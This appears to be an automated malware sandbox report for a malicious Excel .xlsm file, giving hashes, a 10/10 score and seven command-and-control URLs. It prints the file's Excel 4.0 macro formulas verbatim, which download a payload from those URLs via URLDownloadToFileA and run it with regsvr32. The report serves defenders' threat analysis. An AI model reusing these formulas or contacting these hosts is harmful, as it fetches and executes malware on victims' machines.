Overview

overview

10

Static

static

10

5ca569e756...f.xlsm

windows7-x64

10

5ca569e756...f.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    5ca569e7566bbc94deeaf0f8c6aac87f5e7d12f508b31f5b67a320c502132daf

  • Size

    38KB

  • Sample

    241120-2fy95svhpn

  • MD5

    e04ffc173ce256475f3b7bc5b8c8b33c

  • SHA1

    e71f8f1046456966ada265b5dfd61baf1ee2f9fa

  • SHA256

    5ca569e7566bbc94deeaf0f8c6aac87f5e7d12f508b31f5b67a320c502132daf

  • SHA512

    33f7c04f2f95e90e814dbadc67f5b17b66c7d66cf3eb04b9d8ef633c8ae74c776dfeec4cc95a1b81058d8c7fc59d555df71d1ae7d6a17dd83bd70bebc04d685f

  • SSDEEP

    768:6mcXd/GCR8tijOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFs:6mqTeSOZZ1ZYpoQ/pMAeVIyTCR

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.berekethaber.com/dosyalar/4MZnNVw8Z/

https://damjangro.org/data/IlBcH2mM/

https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/

https://www.awam.be/wp-admin/ug9Zz/

https://protokol.mx/Archivos/SjKWNoeYre/

https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/

https://bengtverhoef.nl/stats/SJ1csD7/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/4MZnNVw8Z/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/IlBcH2mM/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.awam.be/wp-admin/ug9Zz/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/SjKWNoeYre/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bengtverhoef.nl/stats/SJ1csD7/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://www.berekethaber.com/dosyalar/4MZnNVw8Z/
xlm40.dropper

https://damjangro.org/data/IlBcH2mM/
xlm40.dropper

https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/

Targets

    • Target

      5ca569e7566bbc94deeaf0f8c6aac87f5e7d12f508b31f5b67a320c502132daf

    • Size

      38KB

    • MD5

      e04ffc173ce256475f3b7bc5b8c8b33c

    • SHA1

      e71f8f1046456966ada265b5dfd61baf1ee2f9fa

    • SHA256

      5ca569e7566bbc94deeaf0f8c6aac87f5e7d12f508b31f5b67a320c502132daf

    • SHA512

      33f7c04f2f95e90e814dbadc67f5b17b66c7d66cf3eb04b9d8ef633c8ae74c776dfeec4cc95a1b81058d8c7fc59d555df71d1ae7d6a17dd83bd70bebc04d685f

    • SSDEEP

      768:6mcXd/GCR8tijOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFs:6mqTeSOZZ1ZYpoQ/pMAeVIyTCR

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks